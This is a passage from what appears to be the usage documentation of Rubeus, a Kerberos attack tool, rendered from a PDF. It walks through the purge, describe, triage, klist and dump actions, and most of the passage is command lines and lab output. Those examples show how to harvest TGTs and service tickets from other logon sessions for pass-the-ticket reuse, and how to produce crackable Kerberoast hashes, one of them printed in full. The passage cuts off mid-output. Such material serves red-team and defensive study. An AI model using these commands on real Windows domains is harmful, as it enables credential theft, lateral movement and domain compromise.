forwarded, forwardable (60a10000)\r\n [1] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM\r\n Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)\r\n [2] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM\r\n Server Name : cifs/primary.testlab.local @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)\r\nC:\\Rubeus\u003eRubeus.exe purge\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\nLuid: 0x0\r\n[*] Action: Purge Tickets\r\n[+] Tickets successfully purged!\r\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 56 of 100\n\nv1.3.3\r\n[*] Action: List Kerberos Tickets (Current User)\r\nC:\\Rubeus\u003e\r\nElevated purging of another logon session:\r\nC:\\Rubeus\u003eRubeus.exe triage /luid:0x474722b\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Triage Kerberos Tickets\r\n[*] Target LUID : 0x474722b\r\n-----------------------------------------------------------------------------------\r\n| LUID | UserName | Service | EndTime |\r\n-----------------------------------------------------------------------------------\r\n| 0x474722b | dfm.a @ TESTLAB.LOCAL | krbtgt/testlab.local | 2/11/2019 7:55:18 PM |\r\n-----------------------------------------------------------------------------------\r\nC:\\Rubeus\u003eRubeus.exe purge /luid:0x474722b\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 57 of 100\n\nLuid: 0x474722b\r\n[*] Action: Purge Tickets\r\n[*] Target LUID: 0x474722b\r\n[+] Tickets successfully purged!\r\nC:\\Rubeus\u003eRubeus.exe triage /luid:0x474722b\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Triage Kerberos Tickets\r\n[*] Target LUID : 0x474722b\r\n---------------------------------------\r\n| LUID | UserName | Service | EndTime |\r\n---------------------------------------\r\n---------------------------------------\r\ndescribe\r\nThe describe action takes a /ticket:X value (TGT or service ticket), parses it, and describes the values of the\r\nticket. Like other /ticket:X parameters, the value can be a base64 encoding of a .kirbi file or the path to a .kirbi\r\nfile on disk.\r\nIf the supplied ticket is a service ticket AND the encryption type is RC4_HMAC, an extracted Kerberoast-compatible hash is output. If the ticket is a service ticket but the encryption key is AES128/AES256, a warning is\r\ndisplayed. If the ticket is a TGT, no hash or warning is displayed.\r\nThe EncTicketPart (encrypted section of the ticket) can be decrypted using the /servicekey:X argument, this\r\nwill also verify the ServerChecksum within the PAC. The /krbkey:X argument can also be used for service\r\ntickets to verify the KDCChecksum and TicketChecksum (if it exists).\r\nBy passing the /serviceuser:X argument (and /servicedomain:X is required), an crackable \"hash\" can be\r\nformed from an AES256 encrypted ticket service ticket.\r\nDisplay information about a TGT:\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 58 of 100\n\nC:\\Rubeus\u003eRubeus.exe describe /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Describe Ticket\r\nUserName : dfm.a\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : krbtgt/testlab.local\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 2/11/2019 2:55:18 PM\r\nEndTime : 2/11/2019 7:55:18 PM\r\nRenewTill : 2/18/2019 2:55:18 PM\r\nFlags : name_canonicalize, pre_authent, initial, renewable, forwardable\r\nKeyType : rc4_hmac\r\nBase64(key) : e3MxrlTu9jHh9hG43UfiAQ==\r\nDisplay information about service ticket with an extracted Kerberoast \"hash\":\r\nC:\\Rubeus\u003eRubeus.exe describe /ticket:service_ticket.kirbi\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.1\r\n[*] Action: Describe Ticket\r\nUserName : harmj0y\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : asdf/asdfasdf\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 2/20/2019 8:58:14 AM\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 59 of 100\n\nEndTime : 2/20/2019 12:41:09 PM\r\nRenewTill : 2/27/2019 7:41:09 AM\r\nFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\nKeyType : rc4_hmac\r\nBase64(key) : WqGWK4htp7rM1CURpxjMPA==\r\nKerberoast Hash : $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$DEB467BF9C9023E...(snip)...\r\nDisplay information about a TGT along with the decrypted PAC:\r\nC:\\Rubeus\u003eRubeus.exe describe /servicekey:6a8941dcb801e0bf63444b830e5faabec24b442118ec60def839fd47a10ae3d5 /tic\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Describe Ticket\r\n ServiceName : krbtgt/rubeus.ghostpack.local\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : exploitph\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 28/07/2021 21:25:45\r\n EndTime : 29/07/2021 07:25:45\r\n RenewTill : 04/08/2021 21:25:45\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable\r\n KeyType : rc4_hmac\r\n Base64(key) : Gcf0pE1AVgbbmtSRqJbf9A==\r\n Decrypted PAC :\r\n LogonInfo :\r\n LogonTime : 20/07/2021 22:10:22\r\n LogoffTime :\r\n KickOffTime :\r\n PasswordLastSet : 14/07/2021 00:50:44\r\n PasswordCanChange : 15/07/2021 00:50:44\r\n PasswordMustChange :\r\n EffectiveName : exploitph\r\n FullName : Exploit PH\r\n LogonScript :\r\n ProfilePath :\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 60 of 100\n\nHomeDirectory :\r\n HomeDirectoryDrive :\r\n LogonCount : 11\r\n BadPasswordCount : 0\r\n UserId : 1104\r\n PrimaryGroupId : 513\r\n GroupCount : 1\r\n Groups : 513\r\n UserFlags : (32) EXTRA_SIDS\r\n UserSessionKey : 0000000000000000\r\n LogonServer : PDC1\r\n LogonDomainName : RUBEUS\r\n LogonDomainId : S-1-5-21-3237111427-1607930709-3979055039\r\n UserAccountControl : (262672) NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION\r\n ExtraSIDCount : 1\r\n ExtraSIDs : S-1-18-1\r\n ResourceGroupCount : 0\r\n ClientName :\r\n Client Id : 28/07/2021 21:25:45\r\n Client Name : exploitph\r\n UpnDns :\r\n DNS Domain Name : RUBEUS.GHOSTPACK.LOCAL\r\n UPN : exploitph@rubeus.ghostpack.local\r\n Flags : 0\r\n ServerChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : DC220C13C97C5723456DADE2 (VALID)\r\n KDCChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : 32C03715F0B11E3D2EDA3D05 (VALID)\r\nDisplaying information about an AES256 encrypted service ticket with an extracted Kerberoast \"hash\":\r\nC:\\Rubeus\u003eRubeus.exe describe /serviceuser:exploitph /ticket:doIFSjCCB...(snip)...Vyb2FzdBsCbWU=\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Describe Ticket\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 61 of 100\n\nServiceName : roast/me\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : harmj0y\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 28/07/2021 21:31:57\r\n EndTime : 29/07/2021 07:31:20\r\n RenewTill : 04/08/2021 21:31:20\r\n Flags : name_canonicalize, pre_authent, renewable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : T+hpOdnnvvLhnSwup/O/DmYYY3CXVP4kN/Hq5qWWwKg=\r\n Kerberoast Hash : $krb5tgs$18$exploitph$RUBEUS.GHOSTPACK.LOCAL$*roast/me*$1063B9C2E8BAB76E5051F5DE\r\n $CD5F3403552BD882CBC52389C9851EFD9B7B72174CCA44876DD4E2958FE807B2A899EE33279835D\r\n 01BEF12B6FE65174B4BF7B6A5062F45DDBEDA76CF2B122579194B3F1CF3192F982EFE5109B4FF644\r\n FDE4D4A170551B764A699DC4DB3535AE937E24D8D5EF0C980C98D115A6707A1F2583FAAB76FD4514\r\n 6957453FAAD213EF28ACED98E72CC909FCC8CB0FD904DE71607BB1C25163EC9512996057CB34950F\r\n 40480CABC5CA812B06E461FF3ECAE62022D7BA3500B506AF9BCD557DB987D565FEC8583E5C093AB5\r\n AF7387930AE3DBC0C4197DB75988D0785E90B1C799C1245CBC891BEC5008BFED99A8042214300440\r\n 4846C3296A721B546428CA71640B2BDD730ADEDBE6217C572288D904E5F64843148EF30BED8F62A7\r\n A038B770DDD787BBBDCCBC4BF63EAC4C18E596F9A1C21B3265C1D402E84547B5491E4FE8E9B05E10\r\n 606773DA47C2570B7B191AE2648C0C467ED242F86C2DC5BD90D5E07D5C3DAACC917E796E5ACB416B\r\n 8D980AC30D300016556AEF064DC6C0822D6EAEF41EC5C376E46BE54AB6B85959BDEDF0D15F87AD07\r\n 14F8999503F6DEEDC5F1798D7F82FB4A068D1C44A761C44589EAF7E17D4C855893A8C71B2FE309EB\r\n 2FE87D36429CF0CA9AA3B02C981F2E6900D0B887EBF1438B3D084963D5AD6B06894A49D3BFED4A19\r\n 5CA0A544A6E73B46E85C0B5E6F7230884E44B265A48CB5EFF3EC699B63DF4C5241FC11F2E74953CF\r\n DD610C9B3137CD15C716E538F42464A37D2B5F719B6FD0D783509B503E68F46F1FE0E03D12B97B79\r\n 6EFB104E093F625894C59BC025273CF0F0B1EF975FF9584AEE227E27304DE545C71B367BEF2EF6DA\r\n 22CFF2940387DEA77446B84AC436C7FD273C04247D67334A8D2F2729DE88287BB270D0F495F8EA50\r\n 126EA94E7417A4191D080A7284FF2736C704A03EF7F7A044A6E357972A7BAC56AD3775C110A10954\r\n 0656CB6759BB61B47B7FF5545A97735279CDB281F632DAD91047FBEC3E98F8B5BC10CA4FFE446186\r\n 67BC174CFE97E2262EE8E4651AB460AB2E9A1B214566969FE30BC9A2EEA2BBC79E1ABDBB5A6E8BB6\r\n 0EF60EB33DCA0F50682DAB8A2F4AE863F83AD928E8D977AA2079706827B78A0CF37FA2D62EAD3A14\r\n 70625022335458E0E84C11786E9A84CAB5A136777B9E8293142D62D96DF9E04AACE6839E13CC54CA\r\n B2B7F5752F8CE9544D7076960CCD7D26C8A0E8E9C879A11A44D2BCC607CE15862E29361C786C095C\r\n 1EA55D7BD277E581E2488BD3FA4B8E09C331A1E7E3C4BE1C745B59E710362F8EEE9578EF9E5FB34F\r\n AAA63C3D7D85000A84A29831B01BD0F4239263FDF59621E57CEE718B29AA2561857C4CD8020AF057\r\n AB5AC097DA90E9B15F6C881F47D95A9F9C15B60EE0B821FDDEB3A9AD4D71E\r\nTicket Extraction and Harvesting\r\nBreakdown of the ticket extraction/harvesting commands:\r\nCommand Description\r\ntriage LUID, username, service target, ticket expiration\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 62 of 100\n\nCommand Description\r\nklist Detailed logon session and ticket info\r\ndump Detailed logon session and ticket data\r\ntgtdeleg Retrieve usable TGT for non-elevated user\r\nmonitor Monitor logon events and dump new tickets\r\nharvest Same as monitor but with auto-renewal functionality\r\nNote: triage/klist/dump give increasing amounts of ticket detail.\r\ntriage\r\nThe triage action will output a table of the current user's Kerberos tickets, if not elevated. If run from an elevated\r\ncontext, a table describing all Kerberos tickets on the system is displayed. Ticket can be filtered for a specific\r\nservice with /service:SNAME .\r\nIf elevated, tickets can be filtered for a specific LogonID with /luid:0xA.. or a specific user with /user:USER .\r\nThis can be useful when triaging systems with a lot of Kerberos tickets.\r\nTriage all enumerateable tickets (non-elevated):\r\nC:\\Rubeus\u003eRubeus.exe triage\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Triage Kerberos Tickets (Current User)\r\n[*] Current LUID : 0x4420e\r\n-----------------------------------------------------------------------------------------\r\n| LUID | UserName | Service | EndTime |\r\n-----------------------------------------------------------------------------------------\r\n| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |\r\n| 0x4420e | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 63 of 100\n\n| 0x4420e | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 4:04:14 PM |\r\n-----------------------------------------------------------------------------------------\r\nTriage all enumerateable tickets (elevated):\r\nC:\\Rubeus\u003eRubeus.exe triage\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Triage Kerberos Tickets (All Users)\r\n-------------------------------------------------------------------------------------------------------------\r\n| LUID | UserName | Service | EndTime |\r\n-------------------------------------------------------------------------------------------------------------\r\n| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |\r\n| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:14 PM |\r\n| 0x56cdda9 | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 4:04:14 PM |\r\n| 0x56cdd86 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 4:04:02 PM |\r\n| 0x47869cc | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:19:11 PM |\r\n| 0x47869cc | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:19:11 PM |\r\n| 0x47869cc | harmj0y @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/12/2019 3:19:11 PM |\r\n| 0x47869b4 | harmj0y @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 3:05:29 PM |\r\n| 0x3c4c241 | dfm.a @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/11/2019 4:24:02 AM |\r\n| 0x441d8 | dfm.a @ TESTLAB.LOCAL | cifs/primary.testlab.local | 2/10/2019 11:41:26 PM |\r\n| 0x441d8 | dfm.a @ TESTLAB.LOCAL | LDAP/primary.testlab.local | 2/10/2019 11:41:26 PM |\r\n| 0x3e4 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 1:25:01 PM |\r\n| 0x3e4 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 1:25:01 PM |\r\n| 0x3e4 | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local | 2/12/2019 1:25:01 PM |\r\n| 0x3e4 | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 2:23:45 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | krbtgt/TESTLAB.LOCAL | 2/12/2019 2:23:45 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | cifs/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | WINDOWS10$ | 2/12/2019 2:23:45 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |\r\n-------------------------------------------------------------------------------------------------------------\r\nTriage targeting a specific service (elevated):\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 64 of 100\n\nC:\\Rubeus\u003eRubeus.exe triage /service:ldap\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Triage Kerberos Tickets (All Users)\r\n[*] Target service : ldap\r\n-----------------------------------------------------------------------------------------------------------\r\n| LUID | UserName | Service | EndTime |\r\n-----------------------------------------------------------------------------------------------------------\r\n| 0x441d8 | dfm.a @ TESTLAB.LOCAL | LDAP/primary.testlab.local | 2/10/2019 11:41:26 PM |\r\n| 0x3e4 | windows10$ @ TESTLAB.LOCAL | ldap/primary.testlab.local/testlab.local | 2/11/2019 7:23:48 PM |\r\n| 0x3e7 | windows10$ @ TESTLAB.LOCAL | LDAP/PRIMARY.testlab.local/testlab.local | 2/12/2019 2:23:45 PM |\r\n-----------------------------------------------------------------------------------------------------------\r\nklist\r\nThe klist will list detailed information on the current user's logon session and Kerberos tickets, if not elevated. If\r\nrun from an elevated context, information on all logon sessions and associated Kerberos tickets is displayed.\r\nLogon and ticket information can be displayed for a specific LogonID with /luid:0xA.. (if elevated).\r\nListing the current (non-elevated) user's logon session and Kerberos ticket information:\r\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 65 of 100\n\n[*] Action: List Kerberos Tickets (Current User)\r\n[*] Current LUID : 0x4420e\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/12/2019 11:04:14 AM ; 2/12/2019 4:04:14 PM ; 2/19/2019 11:04:14 AM\r\n Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)\r\n ...(snip)...\r\nElevated listing of another user's logon session/Kerberos ticket information:\r\nC:\\Rubeus\u003eRubeus.exe klist /luid:0x47869b4\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: List Kerberos Tickets (All Users)\r\n[*] Target LUID : 0x47869b4\r\nUserName : harmj0y\r\nDomain : TESTLAB\r\nLogonId : 0x47869b4\r\nUserSID : S-1-5-21-883232822-274137685-4173207997-1111\r\nAuthenticationPackage : Kerberos\r\nLogonType : Interactive\r\nLogonTime : 2/11/2019 11:05:31 PM\r\nLogonServer : PRIMARY\r\nLogonServerDNSDomain : TESTLAB.LOCAL\r\nUserPrincipalName : harmj0y@testlab.local\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 3:05:31 PM ; 2/11/2019 8:05:31 PM ; 2/18/2019 3:05:31 PM\r\n Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 66 of 100\n\nFlags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)\r\n ...(snip)...\r\ndump\r\nThe dump action will extract current TGTs and service tickets if in an elevated context. If not elevated, service\r\ntickets for the current user are extracted. The resulting extracted tickets can be filtered by /service (use\r\n/service:krbtgt for TGTs) and/or logon ID (the /luid:0xA.. parameter). The KRB-CRED files (.kirbis) are\r\noutput as base64 blobs and can be reused with the ptt function, or Mimikatz's kerberos::ptt functionality.\r\nNote: if run from a non-elevated context, the session keys for TGTs are not returned (by default) from the\r\nassociated APIs, so only service tickets extracted will be usable. If you want to (somewhat) workaround this, use\r\nthe tgtdeleg command.\r\nExtracting the current user's usable service tickets:\r\nC:\\Rubeus\u003eRubeus.exe dump\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Dump Kerberos Ticket Data (Current User)\r\n[*] Current LUID : 0x4420e\r\n[*] Returned 3 tickets\r\nServiceName : krbtgt/TESTLAB.LOCAL\r\nTargetName : krbtgt/TESTLAB.LOCAL\r\nClientName : harmj0y\r\nDomainName : TESTLAB.LOCAL\r\nTargetDomainName : TESTLAB.LOCAL\r\nAltTargetDomainName : TESTLAB.LOCAL\r\nSessionKeyType : rc4_hmac\r\nBase64SessionKey : AAAAAAAAAAAAAAAAAAAAAA==\r\nKeyExpirationTime : 12/31/1600 4:00:00 PM\r\nTicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 67 of 100\n\nStartTime : 2/11/2019 3:19:15 PM\r\nEndTime : 2/11/2019 8:19:13 PM\r\nRenewUntil : 2/18/2019 3:19:13 PM\r\nTimeSkew : 0\r\nEncodedTicketSize : 1306\r\nBase64EncodedTicket :\r\n doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...\r\n...(snip)...\r\n[*] Enumerated 3 total tickets\r\n[*] Extracted 3 total tickets\r\nElevated extraction of tickets from a specific logon session:\r\nC:\\Rubeus\u003eRubeus.exe dump /luid:0x47869cc\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Dump Kerberos Ticket Data (All Users)\r\n[*] Target LUID: 0x47869cc\r\nUserName : harmj0y\r\nDomain : TESTLAB\r\nLogonId : 0x47869cc\r\nUserSID : S-1-5-21-883232822-274137685-4173207997-1111\r\nAuthenticationPackage : Negotiate\r\nLogonType : Interactive\r\nLogonTime : 2/11/2019 11:05:31 PM\r\nLogonServer : PRIMARY\r\nLogonServerDNSDomain : TESTLAB.LOCAL\r\nUserPrincipalName : harmj0y@testlab.local\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 68 of 100\n\n[*] Enumerated 3 ticket(s):\r\n ServiceName : krbtgt/TESTLAB.LOCAL\r\n TargetName : krbtgt/TESTLAB.LOCAL\r\n ClientName : harmj0y\r\n DomainName : TESTLAB.LOCAL\r\n TargetDomainName : TESTLAB.LOCAL\r\n AltTargetDomainName : TESTLAB.LOCAL\r\n SessionKeyType : rc4_hmac\r\n Base64SessionKey : u9DOCzuGKAZB6h/E/9XcFg==\r\n KeyExpirationTime : 12/31/1600 4:00:00 PM\r\n TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\n StartTime : 2/11/2019 3:21:53 PM\r\n EndTime : 2/11/2019 8:19:13 PM\r\n RenewUntil : 2/18/2019 3:19:13 PM\r\n TimeSkew : 0\r\n EncodedTicketSize : 1306\r\n Base64EncodedTicket :\r\n doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...\r\n ServiceName : krbtgt/TESTLAB.LOCAL\r\n TargetName : krbtgt/TESTLAB.LOCAL\r\n ClientName : harmj0y\r\n DomainName : TESTLAB.LOCAL\r\n TargetDomainName : TESTLAB.LOCAL\r\n AltTargetDomainName : TESTLAB.LOCAL\r\n SessionKeyType : aes256_cts_hmac_sha1\r\n Base64SessionKey : tKcszT8rdYyxBxBHlkpmJ/SEsfON8mBMs4ZN/29Xv8A=\r\n KeyExpirationTime : 12/31/1600 4:00:00 PM\r\n TicketFlags : name_canonicalize, pre_authent, initial, renewable, forwardable\r\n StartTime : 2/11/2019 3:19:13 PM\r\n EndTime : 2/11/2019 8:19:13 PM\r\n RenewUntil : 2/18/2019 3:19:13 PM\r\n TimeSkew : 0\r\n EncodedTicketSize : 1338\r\n Base64EncodedTicket :\r\n doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...\r\n ...(snip)...\r\n[*] Enumerated 3 total tickets\r\n[*] Extracted 3 total tickets\r\nElevated extraction of all TGTs on a system:\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 69 of 100\n\nC:\\Rubeus\u003eRubeus.exe dump /service:krbtgt\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Dump Kerberos Ticket Data (All Users)\r\n[*] Target service : krbtgt\r\nUserName : harmj0y\r\nDomain : TESTLAB\r\nLogonId : 0x47869cc\r\nUserSID : S-1-5-21-883232822-274137685-4173207997-1111\r\nAuthenticationPackage : Negotiate\r\nLogonType : Interactive\r\nLogonTime : 2/11/2019 11:05:31 PM\r\nLogonServer : PRIMARY\r\nLogonServerDNSDomain : TESTLAB.LOCAL\r\nUserPrincipalName : harmj0y@testlab.local\r\n [*] Enumerated 3 ticket(s):\r\n ServiceName : krbtgt/TESTLAB.LOCAL\r\n TargetName : krbtgt/TESTLAB.LOCAL\r\n ClientName : harmj0y\r\n DomainName : TESTLAB.LOCAL\r\n TargetDomainName : TESTLAB.LOCAL\r\n AltTargetDomainName : TESTLAB.LOCAL\r\n SessionKeyType : rc4_hmac\r\n Base64SessionKey : y4LL+W3KZoOjnwsiwf150g==\r\n KeyExpirationTime : 12/31/1600 4:00:00 PM\r\n TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\n StartTime : 2/11/2019 3:23:50 PM\r\n EndTime : 2/11/2019 8:19:13 PM\r\n RenewUntil : 2/18/2019 3:19:13 PM\r\n TimeSkew : 0\r\n EncodedTicketSize : 1306\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 70 of 100\n\nBase64EncodedTicket :\r\n doIFFjCCBRKgAwIBBaEDAgEWoo...(snip)...\r\n ...(snip)...\r\nUserName : WINDOWS10$\r\nDomain : TESTLAB\r\nLogonId : 0x3e4\r\nUserSID : S-1-5-20\r\nAuthenticationPackage : Negotiate\r\nLogonType : Service\r\nLogonTime : 2/7/2019 4:51:20 PM\r\nLogonServer :\r\nLogonServerDNSDomain : testlab.local\r\nUserPrincipalName : WINDOWS10$@testlab.local\r\n [*] Enumerated 4 ticket(s):\r\n ServiceName : krbtgt/TESTLAB.LOCAL\r\n TargetName : krbtgt/TESTLAB.LOCAL\r\n ClientName : WINDOWS10$\r\n DomainName : TESTLAB.LOCAL\r\n TargetDomainName : TESTLAB.LOCAL\r\n AltTargetDomainName : TESTLAB.LOCAL\r\n SessionKeyType : rc4_hmac\r\n Base64SessionKey : 